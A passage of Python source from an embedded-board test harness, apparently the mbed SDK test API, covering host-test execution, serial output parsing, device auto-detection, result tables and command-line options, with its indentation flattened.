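#   self.test_loop_list_to_dict(['TEST_1=5', 'TEST_2=3', 'broken'])
#   # -> {'TEST_1': 5, 'TEST_2': 3}   (malformed entries are skipped)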
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception as e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print("Error: No Mbed available: MUT[%s]" % data['mcu'])
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Copy (flash) method declared for this MUT; falls back to the command-line option if absent
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (the mount point may have changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print("Error: mbed not found with MBEDLS: %s" % data['mcu'])
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test systems were separate, this was relative to a
# base network folder path: join(NETWORK_BASE_PATH, ).
# "image" is now a list representing a development image and an update image
# (for device management). When testing, we only use the development image.
image_path = image[0]
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print(single_test_output)
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # Time of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print(self.print_test_result(
single_test_result, target_name_unique, toolchain_name, test_id,
test_description, elapsed_time, single_timeout))
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.items():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
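# Usage sketch (hypothetical per-loop results): the two helpers above collapse
# looped runs into the single row shown in the summary, e.g.
#
#   results = [self.TEST_RESULT_OK, self.TEST_RESULT_FAIL, self.TEST_RESULT_OK]
#   self.shape_test_loop_ok_result_count(results)       # -> '2/3'
#   self.shape_global_test_loop_result(results, False)  # -> self.TEST_RESULT_FAIL (mixed results)
#   self.shape_global_test_loop_result(results, True)   # -> self.TEST_RESULT_OK (waterfall + consolidate)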
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print(Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET)
print("Test::Output::Start")
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent restarting the timer repeatedly
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update the timeout only once, using the value auto-detected from the test
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print("Test::Output::Finish")
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.items():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
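# Usage sketch (hypothetical values): the produced JSON string is what handle()
# later receives as test_spec and decodes with json.loads(), e.g.
#
#   self.shape_test_request('K64F', './BUILD/tests/basic.bin', 'MBED_A1', duration=20)
#   # -> '{"mcu": "K64F", "image": "./BUILD/tests/basic.bin", "duration": 20, "test_id": "MBED_A1"}'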
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print('Line %d:\t'%line_no + json_line)
if line_no == line:
print('%s\t%s^' % (' ' * len('Line %d:' % line_no),
'-' * (column - 1)))
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
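# Usage sketch: json.loads() error messages embed the defect position, e.g.
#
#   json_format_error_defect_pos("Expecting ',' delimiter: line 7 column 5 (char 63)")
#   # -> [7, 5]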
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print('JSON file %s parsing failed. Reason: %s' %
(json_spec_filename, json_error_msg))
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print()
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print('JSON file %s not opened. Reason: %s\n'%
(json_spec_filename, fileopen_error_msg))
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols, junction_char="|", hrules=HEADER)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if isinstance(cell_val, list):
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols, junction_char="|", hrules=HEADER)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
suffix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, suffix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties, junction_char="|", hrules=HEADER)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# Filter out tests using the platform_filter regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if isinstance(test[col], list):
col_value = join_delim.join(test[col])
elif test[col] is None:
col_value = "-"
row.append(col_value)
if test['automated'] is True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols, junction_char="|", hrules=HEADER)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols, junction_char="|", hrules=HEADER)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress // 2) # Scale percentage to bar length (0 - 50 characters)
str_progress = '#' * step + '.' * (50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation // 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
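# Output sketch: the bar is always 50 characters of '#'/'.' plus an optional
# saturation marker ('|' or '!') spliced in at saturation // 2, e.g.
#
#   progress_bar(100.0)      # -> '#' * 50
#   progress_bar(0.0)        # -> '.' * 50
#   progress_bar(50.0, 75)   # -> half-filled bar with a marker at index 37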
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(single_test.generate_test_summary(test_summary, shuffle_seed))
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows test x toolchain test result matrix
print(single_test.generate_test_summary_by_target(test_summary,
shuffle_seed))
print("Completed in %.2f sec" % elapsed_time)
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_text_file_name:
# Export results in form of a text file
report_exporter = ReportExporter(ResultExporterType.TEXT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as a JUnit report to a separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger(object):
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def get_module_avail(module_name):
""" This function returns True if module_name is already imported module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name_filter list of platform names used to filter the detected 'platform_name' entries
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique we assign the 'platform_name_unique' value from the mbedls output (if it exists);
# if not, we create our own unique value (the last few chars of the platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
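# Result sketch (hypothetical board, reusing the example mbedls record above):
# a single detected NUCLEO_F302R8 would yield a muts_all.json-style dictionary:
#
#   {1: {'mcu': 'NUCLEO_F302R8',
#        'mcu_unique': 'NUCLEO_F302R8[F72A]',
#        'port': 'COM34',
#        'disk': 'E:',
#        'peripherals': []}}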
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter:
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
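# Result sketch (hypothetical K64F MUT): with use_default_toolchain=True and
# toolchain_filter=['GCC_ARM'], and assuming K64F's default toolchain is ARM and
# GCC_ARM is among its supported toolchains, the generated fragment would be:
#
#   {'targets': {'K64F': ['ARM', 'GCC_ARM']}}
#
# (the toolchain list is de-duplicated with set(), so its order is not guaranteed)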
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with test specification')
parser.add_argument('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_argument("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type=int,
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_argument('--auto',
dest='auto_detect',
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
parser.add_argument('--tc',
dest='toolchains_filter',
type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_argument('--oper',
dest='operability_checks',
type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_argument('--clean',
dest='clean',
action="store_true",
help='Clean the build directory')
parser.add_argument('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripherals declared for the MUT and skip common tests')
parser.add_argument("--profile", dest="profile", action="append",
type=argparse_filestring_type,
default=[])
parser.add_argument('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip peripherals tests and perform common tests')
parser.add_argument('-n', '--test-by-names',
dest='test_by_names',
type=argparse_many(str),
help='Runs only tests enumerated in this switch. Use commas to separate test case names')
parser.add_argument('-p', '--peripheral-by-names',
dest='peripheral_by_names',
type=argparse_many(str),
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_argument('-c', '--copy-method',
dest='copy_method',
type=argparse_uppercase_type(copy_methods, "flash method"),
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_argument('-r', '--reset-type',
dest='mut_reset_type',
default=None,
type=argparse_uppercase_type(reset_methods, "reset method"),
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_argument('-g', '--goanna-for-tests',
dest='goanna_for_tests',
action="store_true",
help='Run the Goanna static analysis tool for tests (the project will be rebuilt)')
parser.add_argument('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
action="store_true",
help='Run the Goanna static analysis tool for the mbed SDK (the project will be rebuilt)')
parser.add_argument('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of the well-formatted table with test results')
parser.add_argument('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays a well-formatted table with test x toolchain results per target')
parser.add_argument('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_argument('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_argument("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_argument("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_argument('--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental: execute test runners for the MUTs connected to your host in parallel (speeds up test result collection)')
parser.add_argument('--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configuration and exits')
parser.add_argument('--loops',
dest='test_loops_list',
type=argparse_many(str),
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_argument('--global-loops',
dest='test_global_loops_value',
type=int,
